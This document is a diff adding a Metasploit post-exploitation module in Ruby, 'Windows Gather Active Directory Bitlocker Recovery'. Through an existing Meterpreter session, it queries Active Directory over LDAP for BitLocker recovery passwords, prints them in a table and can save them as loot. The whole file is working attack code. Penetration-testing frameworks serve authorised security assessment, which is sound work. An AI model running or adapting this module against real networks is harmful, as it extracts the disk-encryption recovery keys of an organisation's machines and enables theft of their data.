|
| 1 | +## |
| 2 | +# This module requires Metasploit: http//metasploit.com/download |
| 3 | +# Current source: https://github.com/rapid7/metasploit-framework |
| 4 | +## |
| 5 | + |
| 6 | +require 'rex' |
| 7 | +require 'msf/core' |
| 8 | +require 'msf/core/auxiliary/report' |
| 9 | + |
| 10 | +class Metasploit3 < Msf::Post |
| 11 | + |
| 12 | + include Msf::Auxiliary::Report |
| 13 | + include Msf::Post::Windows::LDAP |
| 14 | + |
| 15 | + def initialize(info={}) |
| 16 | + super( update_info( info, |
| 17 | + 'Name' => 'Windows Gather Active Directory Bitlocker Recovery', |
| 18 | + 'Description' => %Q{ |
| 19 | + This module will enumerate bitlocker reocvery passwords in the default AD |
| 20 | + directory. Requires Domain Admin or other delegated privileges. |
| 21 | + }, |
| 22 | + 'License' => MSF_LICENSE, |
| 23 | + 'Author' => [ 'Ben Campbell <ben.campbell[at]mwrinfosecurity.com>' ], |
| 24 | + 'Platform' => [ 'win' ], |
| 25 | + 'SessionTypes' => [ 'meterpreter' ], |
| 26 | + 'References' => |
| 27 | + [ |
| 28 | + ['URL', 'tbc'], |
| 29 | + ] |
| 30 | + )) |
| 31 | + |
| 32 | + register_options([ |
| 33 | + OptInt.new('MAX_SEARCH', [true, 'Maximum values to retrieve, 0 for all.', 50]), |
| 34 | + OptBool.new('STORE_LOOT', [true, 'Store file in loot.', false]), |
| 35 | + OptString.new('FIELDS', [true, 'FIELDS to retrieve.', 'distinguishedName,msFVE-RecoveryPassword']), |
| 36 | + OptString.new('FILTER', [true, 'Search filter.', '(objectClass=msFVE-RecoveryInformation)']) |
| 37 | + ], self.class) |
| 38 | + end |
| 39 | + |
| 40 | + def run |
| 41 | + fields = datastore['FIELDS'].gsub(/\s+/,"").split(',') |
| 42 | + search_filter = datastore['FILTER'] |
| 43 | + max_search = datastore['MAX_SEARCH'] |
| 44 | + q = query(search_filter, max_search, fields) |
| 45 | + |
| 46 | + if q.nil? or q[:results].empty? |
| 47 | + return |
| 48 | + end |
| 49 | + |
| 50 | + # Results table holds raw string data |
| 51 | + results_table = Rex::Ui::Text::Table.new( |
| 52 | + 'Header' => "Bitlocker Recovery Passwords", |
| 53 | + 'Indent' => 1, |
| 54 | + 'SortIndex' => -1, |
| 55 | + 'Columns' => fields |
| 56 | + ) |
| 57 | + |
| 58 | + # Reports are collections for easy database insertion |
| 59 | + reports = [] |
| 60 | + q[:results].each do |result| |
| 61 | + row = [] |
| 62 | + |
| 63 | + report = {} |
| 64 | + 0.upto(fields.length-1) do |i| |
| 65 | + if result[i].nil? |
| 66 | + field = "" |
| 67 | + else |
| 68 | + field = result[i] |
| 69 | + end |
| 70 | + |
| 71 | + row << field |
| 72 | + end |
| 73 | + |
| 74 | + reports << report |
| 75 | + results_table << row |
| 76 | + end |
| 77 | + |
| 78 | + print_line results_table.to_s |
| 79 | + if datastore['STORE_LOOT'] |
| 80 | + stored_path = store_loot('bitlocker.recovery', 'text/plain', session, results_table.to_csv) |
| 81 | + print_status("Results saved to: #{stored_path}") |
| 82 | + end |
| 83 | + end |
| 84 | + |
| 85 | +end |
| 86 | + |
0 commit comments